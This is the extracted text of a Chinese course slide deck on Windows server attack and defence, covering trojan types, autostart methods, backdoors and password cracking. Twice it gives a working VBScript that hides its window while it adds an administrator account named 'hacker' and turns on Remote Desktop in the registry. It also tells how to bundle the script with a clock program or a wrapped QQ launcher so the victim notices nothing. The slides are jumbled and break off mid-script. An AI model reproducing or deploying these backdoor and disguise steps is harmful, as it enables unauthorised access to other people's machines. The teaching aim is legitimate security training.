Windows服务器系统攻防-ppt03-v1.0.pptVIP

N b n e t NBNET 6.0 */19 远程木马：冰河木马 键盘屏幕记录木马：QQ密码记录器 反弹端口型木马：广外女生、网络神偷 DDoS攻击木马：可以用作DDoS攻击的木马 其他木马：专门利用破坏性质的木马、用来隐藏踪迹的代理木马、关闭杀毒软件的杀手木马 * 木马自启动方法: （1）在Windows的“启动”文件夹中自动加载 （2）在Windows系统的注册表中进行配置实现自启动。 （3）通过本地组策略中的启动/关机、登录/注销脚本进行加载。 （4）将程序注册为系统服务。 （5）将程序捆绑到正常程序中，如QQ、IE、记事本等，随着正常程序的启动而自动运行。 * 在记事本中输入页面中的命令，然后将其保存为Config.vbs文件。 该程序双击即可运行。 * chr(34):双引号；chr(34)：连接双引号。 改进后的木马程序在完成自身使命后，再调用原QQ程序，打开QQ登录窗口，这样用户不会觉察到有什么异常。 * Clock.exe为第三方的闹钟软件 选中两个文件“clock.exe”和“Config.vbs”，单击右键，在弹出的菜单中选择“添加到压缩文件”命令 * 暴力破解：如果事先知道了用户的账号，如QQ号码、邮箱账户、网上银行账号等，而用户的密码又设置的十分简单，比如简单数字或者字母的组合，使用暴力破解工具 很快就可以将密码破解出来 字典攻击：遍历一本字典中的所有条目用来猜测密码的一种攻击方式。黑客通常利用一个英语词典或者其他语言的词典，或者使用附加的各类字典数据库，比如常见的名字和常用的密码，如123、123456、abc、admin、password等，这些都属于很常见的弱口令 * 单击“开启监控”按钮，开启监控 可以看到我们输入的QQ号码、密码以及在记事本中输入的内容 * * * dim wshell set wshell=createobject(wscript.shell) wshell.run cmd /c net user hacker benet /add ,vbhide wshell.run cmd /c net localgroup administrators hacker /add ,vbhide wshell.RegWrite HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections,0,REG_DWORD set wshell=nothing wscript.quit * * 参照3.1.4中的例子创建config.vbs 第三章 木马后门与密码破解 —— 理论部分 扫描方式有哪几种？ 常见的扫描工具有哪几种？ 对Windows安全性进行检测的工具是什么？ 用什么工具探测系统弱口令账户？ 课程回顾 了解常见的木马与后门 了解木马的特点 了解常用的密码破解方式 能够实现木马的自启动与隐藏 技能展示 本章结构 木马后门与密码破解 木马的特点 木马举例 木马后门介绍 密码破解 常见木马种类 后门程序 远程控制木马 冰河木马 键盘屏幕记录木马 QQ密码记录器 反弹端口型木马 广外女生、网络神偷 DDoS攻击木马 …… 木马的种类 后门程序 后门程序介绍 后门是木马的一种 可以绕过或挫败系统安全设置 后门程序分类 网页后门 线程插入后门 扩展后门 C/S后门 …… 后门介绍 自启动功能 添加到启动项 修改组策略 修改注册表 捆绑 隐蔽性 木马本身的隐蔽性 运行时的隐蔽性 通信时的隐蔽性 木马的特点 制作木马程序 创建一个具有管理员权限的用户 hacker，密码为 nbnet 打开远程桌面 木马举例4-1 dim wshell set wshell=createobject(wscript.shell) wshell.run cmd /c net user hacker benet /add ,vbhide wshell.run cmd /c net localgroup administrators hacker /add ,vbhide wshell.RegWrite HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections,0,REG_DWORD set wshell=nothing wscript.quit 实现木马程序开机自启动 在注册表中更改开机启动项 木马举例4-2 新建字符串值 添加木马程序文件 脚本木马捆绑 编写脚本QQ.vbs 木马举例4-3 dim wshell set wsh